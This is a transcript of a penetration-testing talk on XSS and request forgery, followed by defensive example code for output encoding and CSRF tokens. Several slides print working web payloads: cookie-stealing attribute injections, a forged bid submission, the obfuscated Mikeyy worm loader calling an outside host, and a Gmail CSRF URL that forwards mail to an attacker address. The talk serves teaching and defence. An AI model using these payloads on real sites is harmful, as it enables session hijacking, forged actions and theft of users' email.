VodQA3_PenetrationTesting_AmitDhakkad
This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

VodQA3_PenetrationTesting_AmitDhakkad Presentation Transcript

  • 1. Amit Dhakad
    Application Developer
    Is considered a “survivor”
    Likes To Read About Black Magic & Illusions
  • 2. What, why and how’s of Penetration Testing
    - Amit Dhakad
    Developer
  • 3. What do I plan to cover?
    What is Penetration Testing?
    XSS
    What is it?
    Types of XSS
    Reflective XSS
    Stored XSS
    Request Forgery
    What is it?
    Types of Request Forgery
    On-site request forgery
    Cross-site request forgery
    Demo
    Attack mechanisms
    Real world examples
    Why do we need to pay attention?
  • 4. Penetration Testing
    Simulating a malicious attack on a system
  • 5. Cross-site scripting (XSS)
    Injecting JavaScript through user-controllable fields
  • 6. Reflective XSS
    Injecting JavaScript using URL parameters
  • 7. Diagram courtesy : The Web Application Hacker’s Handbook
  • 8. Attack: http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
  • 9. Stored XSS
    Exploiting the server’s ability to persist data: the injected script is stored and served to every later visitor
  • 10. Diagram courtesy : The Web Application Hacker’s Handbook
  • 11. Attack: Image URL is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
  • 12. Request Forgery
    Perform unwitting actions on behalf of the user
  • 13. On-site Request Forgery (OSRF)
    From same domain
  • 14. Attack with XSS: Image URL is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif" onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
  • 15. Attack without XSS: Image URL is set to /bids?bid[amount]=500&bid[auction_id]=1
  • 16. Cross-site Request Forgery (CSRF)
    From a different domain
  • 17. Same origin policy
    A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
    A page residing on one domain can load a script from another domain and execute this within its own context.
  • 18. What can you do with XSS and Request Forgery?
    Session hijacking
    Performing arbitrary actions
    Disclosure of user data
  • 19. Real world attacks
  • 20. MySpace worm by Samy (XSS + OSRF)
    Bypassed all filters and added a script to his profile
    The script did two things:
    Added the visiting user as a friend
    The script got copied into the user’s profile
    Anyone visiting the new infected user also got added as Samy’s friend.
  • 21. Protection: MySpace strips out the word "onreadystatechange", which is necessary for XML-HTTP requests
    Attack: eval('xmlhttp.onread' + 'ystatechange = callback');
  • Ebay – discovered by Dave Armstrong (OSRF)
    Crafted URL set as image URL
    Arbitrary bid was placed on behalf of the visiting user
  • 25. Mikeyy Twitter worm (XSS + OSRF)
    Implemented by a 17-year-old boy
    "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
    -- "<script src="http://www.stalkdaily.com/ajax.js"></script>"
    Visiting user got infected
    Infected users began tweeting unwittingly.
  • 26. Gmail vulnerability – discovered by Petko Petkov (CSRF)
    http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
    Add filter to forward all emails to the attacker’s email address
  • 27. Why do we need to pay attention?
    The shift is towards attacking clients
    Technologies don’t provide strong protection
    Considered lame attacks
    Identification using automated tools is difficult
    Penetration testing is considered a separate vertical
  • 28. Break your own walls before anyone else does it
  • 29. Q & A
  • 30. Thank you
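Both XSS demos in the deck (slide 8 and slide 11) break out of a quoted HTML attribute. The following is an added example, not code from the talk or its demo app, showing the attribute-context output encoding that closes that hole; the renderer functions, the `img.example` host and the `alert(1)` stand-in payloads are constructed for the demo.

```javascript
// Added example, not code from the talk: output encoding for the HTML
// attribute context, the defect behind the reflective (slide 8) and stored
// (slide 11) XSS demos. In both, a user-supplied value is concatenated into a
// quoted attribute, so a double quote ends the attribute and the rest of the
// value becomes an event-handler attribute (onclick=, onmouseover=).

// Encode the five characters that can terminate an attribute or open a tag.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable renderer: the pattern behind /pure-reflective-xss?query=...
function renderSearchBoxVulnerable(query) {
  return '<input type="text" name="query" value="' + query + '">';
}

// Hardened renderer: identical markup, value encoded for the attribute context.
function renderSearchBox(query) {
  return '<input type="text" name="query" value="' + escapeHtmlAttr(query) + '">';
}

// Stored XSS (slide 11) is the same defect on a persisted "image URL" written
// into src="...". Encoding stops the attribute break-out; the scheme allowlist
// additionally rejects javascript: and data: URLs, which encoding alone would
// leave executable.
function renderImage(url) {
  let parsed;
  try { parsed = new URL(url); } catch { return ''; }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return '';
  return '<img src="' + escapeHtmlAttr(parsed.href) + '">';
}

// Constructed inputs shaped like the slides' payloads (harmless alert stand-in).
const reflectedPayload = 'title"onclick="alert(1)';
const imagePayload = 'http://img.example/Donald.gif"onmouseover="alert(1)';

// Demo check: does the markup contain an injected on*= attribute, i.e. an
// event-handler name that directly follows a quote or whitespace?
function hasInjectedHandler(html) {
  return /["'\s]on[a-z]+=/i.test(html);
}
```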
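The request-forgery demos (slides 15 and 26) succeed because the server accepts a state-changing request on the strength of the victim's cookies alone. The following is an added example, not the talk's demo app, of the synchronizer-token check that defeats them; the request and session objects are constructed for the demo, and the parameter name `authenticity_token` is an assumption (the Rails convention, since the talk's app at localhost:3000 is not identified).

```javascript
// Added example, not the talk's demo app: server-side checks against the
// forged bid requests of slides 15 and 26. Request/session objects are
// constructed here; a real app would take them from its web framework.
// authenticity_token is an assumed parameter name (Rails convention).
const crypto = require('crypto');

// One random token per session, kept server-side and echoed into real forms.
function issueCsrfToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString('hex');
  return session.csrfToken;
}

// Length check first: timingSafeEqual throws on buffers of unequal length.
function safeEqual(a, b) {
  const ba = Buffer.from(String(a)), bb = Buffer.from(String(b));
  return ba.length === bb.length && crypto.timingSafeEqual(ba, bb);
}

// Decide whether a bid request may change state; the reason is for logging.
function checkBidRequest(req, session, siteOrigin) {
  // Slide 15: <img src="/bids?bid[amount]=500..."> is a GET with no body.
  // Refusing state changes over GET removes that vector outright.
  if (req.method !== 'POST') return { ok: false, reason: 'state change via GET' };
  // Slide 26: a cross-site multipart POST carries the victim's cookies but
  // cannot carry a token the attacker's page never got to read.
  const sent = req.body && req.body.authenticity_token;
  if (!session.csrfToken || !sent || !safeEqual(sent, session.csrfToken)) {
    return { ok: false, reason: 'missing or wrong CSRF token' };
  }
  // Defence in depth: browsers attach an Origin header to cross-site POSTs.
  const origin = req.headers && req.headers.origin;
  if (origin && origin !== siteOrigin) return { ok: false, reason: 'cross-origin POST' };
  return { ok: true, reason: 'accepted' };
}

// Three constructed requests: the two forged shapes and a genuine form post.
function demo() {
  const site = 'http://localhost:3000';
  const session = {};
  const token = issueCsrfToken(session);
  const imageGet = { method: 'GET', headers: {}, body: {} };
  const crossSitePost = { method: 'POST', headers: { origin: 'http://attacker.example' },
                          body: { 'bid[amount]': '500' } };
  const genuinePost = { method: 'POST', headers: { origin: site },
                        body: { 'bid[amount]': '100', authenticity_token: token } };
  return {
    imageGet: checkBidRequest(imageGet, session, site),
    crossSite: checkBidRequest(crossSitePost, session, site),
    genuine: checkBidRequest(genuinePost, session, site),
  };
}
```

The token does not stop slide 14's on-site variant, because a script already running on the same origin can read the token out of the real form and submit it; that case is closed only by fixing the XSS itself.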